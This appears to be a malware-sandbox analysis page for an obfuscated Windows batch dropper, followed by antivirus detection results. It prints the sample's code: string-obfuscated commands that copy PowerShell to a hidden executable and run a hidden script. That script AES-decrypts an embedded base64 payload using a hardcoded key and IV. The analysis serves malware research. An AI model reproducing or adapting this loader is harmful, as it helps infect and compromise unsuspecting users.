Static | ZeroBOX
No static analysis available.
:: cF7CAtovCKr7BpshCgap05MYK+Dhq/fmXcBy7TCrmhrIbimzYyx7I8egBYe36taK0ZFWXKt7yGwuJeYq1nL4UiNq5ND3Qmgadsh+5KZF+9Xz9ZJQ+KumNnfW5Me6E7ME7XXJTaGX9jnupMO3I/cRViH41mUtNfxogP2ELqzj6R6kNVgYoWjlrYwINcbASXDXgbk0Akw2H42hhTaDTTLYhqjmo7Im1AQc+JZDwGZB6kJ2w9I8eTO4pBInNBe6GJ5akQee9Ma1m9A38xrNA2blcng0HtNYreahrN5ZS6bTd69uoim1F50lkpV8MxEh9X5wWEUcqOfLdPWvW2jEFYeeG/aLvFuuB1Alrx6PVk+uBEC4Ke6LzRlQEt9e9zi/iLbiugbSEUP/YtpEXmdQcuAl63uuveG/g3gMgtBZ0wpHySkUMkXMWHDCP3qp2XNl88eIR8i5GuwTputUtAZsYKuudIcVKrtvBuW3zLz4NuY4beqQeTVNTqv5xC4oss+ozmNZisrbh20oO+orneFxzlAGvHjIW3fO96TO/mlyA9xkzskv+sE8Cf2uxHDzpIX20vCmkzRmmNJ9lzCtX+8cq8pANANs8j5mpC64I7m5cgS43pUpE1hKBxEY9qFiLW+9kfQ1L1FxCW4VOie/qahaKot6IWHrr1GLnerTMCZQnjySpi3/YJVryaWsJFPMn4PkkAPlvqgzPokjpqshWzGwh965ROYrRCIqRc9c8uXeadumWnnaNdeRv335XoDig+x5VpmSuJNTbRO9j1k+6qj1ZYpbEnIeKICzosz9VS5stxhAOSGLWoe7zIMpK+4sSbx+IAXOpgOIeoIpUUh0vuvs+DylfK6qY9Px/O84kR30rnSxImXj7UMZlk3Yx2bK0JHlPiLTWRbXNtQtFBqtEAGhNyhQ5yzmHisXpzovduO0/TA2k9/tX4GZJGvGTJolDz0sJKZZUlp+tPIhNeuqoL1lSOdsQromIN5j6ILPu5K9FGYjCU8ys6GDWrKBJ3KlVz0Y6
@echo off
set "hAySry=seVDcNet VDcNeNVDcNetVVDcNe=1VDcNe VDcNe&& sVDcNetarVDcNet "VDcNe" VDcNe/miVDcNen VDcNe"
if not defined NtV (%hAySry:VDcNe=%%0 && exit)
set lKJnIk=%~0.exe
set "ZoRFBj=WinVDcNedowVDcNesPoVDcNewerVDcNeShelVDcNel\vVDcNe1.VDcNe0\pVDcNeowVDcNeersVDcNehelVDcNel.eVDcNexeVDcNe"
set FoHoLN=C:\Windows\System32\%ZoRFBj:VDcNe=%
copy %FoHoLN% "%lKJnIk%" /y
attrib +h "%lKJnIk%"
set "kfgPoG=-VDcNew hidVDcNeVDcNeden -VDcNecVDcNe "$fVDcNeilePVDcNeathVDcNe = '%~f0VDcNe'; $basVDcNee64PatVDcNeternVDcNeVDcNe = '::(.*)'; $bVDcNeaseVDcNe64CodVDcNeVDcNee = ''; $foVDcNeund = $fVDcNealVDcNese; foreVDcNeach ($liVDcNene iVDcNeVDcNen [SysVDcNetem.IVDcNeO.FiVDcNele]::ReaVDcNedLinVDcNees($filePaVDcNeth)) { ifVDcNeVDcNe ($linVDcNee -matVDcNech $base64VDcNePatterVDcNen) { $base6VDcNe4Code = $MatcVDcNehes[1].Trim(); $found = $true; break; } } if ($found) { $base64Code }; $key = 'S1h7yTlbJgEbe8fAoA0dwoHzF+iw98+iDWu9qKOt56s='; $iv = '9JUEq2XY9KUlMg+mRt4Zsg=='; $cryptedBytes = [System.Convert]::FromBasVDcNee64StrVDcNeing($baseVDcNe64CodVDcNee); $aesVDcNe = New-OVDcNebject SysteVDcNem.SecVDcNeurity.CrypVDcNetography.AesCVDcNeryptoSeVDcNervicePVDcNerovider; $aVDcNees.Key = [System.Convert]::FromBVDcNease64StrVDcNeing($keVDcNey); $aeVDcNes.IV = [SystVDcNeem.ConveVDcNert]::FromBase6VDcNe4StriVDcNeng($iv); $aVDcNees.MoVDcNede = [SysVDcNetem.SecuVDcNerity.CryptVDcNeography.CipVDcNeherMode]::CBVDcNeC; $aVDcNees.
call "%lKJnIk%" %kfgPoG:VDcNe=%
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.PS.Dropper.hg
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Trojan.BAT.Obfus.gen
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Tencent Clean
Emsisoft Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
FireEye Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Trojan.BAT.Obfus.gen
GData Clean
Varist Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
ALYac Clean
MAX Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet BAT/Kryptik.FU!tr
AVG Clean
Panda Clean
No IRMA results available.